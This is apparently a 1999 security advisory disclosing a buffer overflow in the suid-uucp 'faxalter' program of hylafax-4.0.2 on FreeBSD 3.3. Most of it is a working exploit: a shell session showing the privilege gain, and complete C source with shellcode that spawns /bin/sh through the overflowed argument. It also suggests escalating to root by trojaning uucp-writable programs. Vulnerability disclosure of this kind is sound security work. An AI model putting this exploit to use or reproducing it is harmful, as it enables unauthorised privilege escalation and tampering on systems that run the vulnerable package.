Greetings, OVERVIEW A vulnerability exists in "faxalter", part of the hylafax-4.0.2 package which will allow any user gain uucp and possibly root privs. BACKGROUND My tests were done only on FreeBSD 3.3-RELEASE which includes the hylafax package as an "additional package" on the install CD. Of course, hylafax runs on many different platforms thus anyone running hylafax should check out his or her version for this vulnerability. DETAILS The faxalter program is installed suid-uucp by default when installed from the FreeBSD-3.3 CD hylafax package. This program is contains a buffer overflow which will allow any user to gain uucp privs. This could become a root-compromise considering that uucp has write access to several programs (such as minicom, cu and ecu on FreeBSD 3.3) and could potentially trojan these programs. In addition to this, the suid-root "hfaxd" program reads/writes to several uucp-owned files. At the very least, a malicious user could intercept all faxes, uucp transmitions and be generally annoying. EXPLOIT bash-2.03$ uname -a; ls -la `which faxalter`; id FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386 -r-sr-xr-x 1 uucp bin 72332 Sep 11 03:32 /usr/local/bin/faxalter uid=1000(xnec) gid=1000(xnec) groups=1000(xnec), 0(wheel) bash-2.03$ /home/xnec/faxalterx $ id uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec), 0(wheel) $ /* * Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp) * Brock Tellier btellier@usa.net */ #include char shell[]= /* mudge@lopht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; main (int argc, char *argv[] ) { int x = 0; int y = 0; int offset = 0; int bsize = 4093; /* overflowed buf's bytes + 4(ebp) + 4(eip) + 1 */ char buf[bsize]; int eip = 0xbfbfcfad; if (argv[1]) { offset = atoi(argv[1]); eip = eip + offset; } fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); for ( x = 0; x < 4021; x++) buf[x] = 0x90; fprintf(stderr, "NOPs to %d\n", x); for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; fprintf(stderr, "Shellcode to %d\n",x); buf[x++] = eip & 0x000000ff; buf[x++] = (eip & 0x0000ff00) >> 8; buf[x++] = (eip & 0x00ff0000) >> 16; buf[x++] = (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[bsize - 1]='\0'; execl("/usr/local/bin/faxalter", "faxalter", "-m", buf, NULL); } Brock Tellier UNIX Systems Administrator Chicago, IL, USA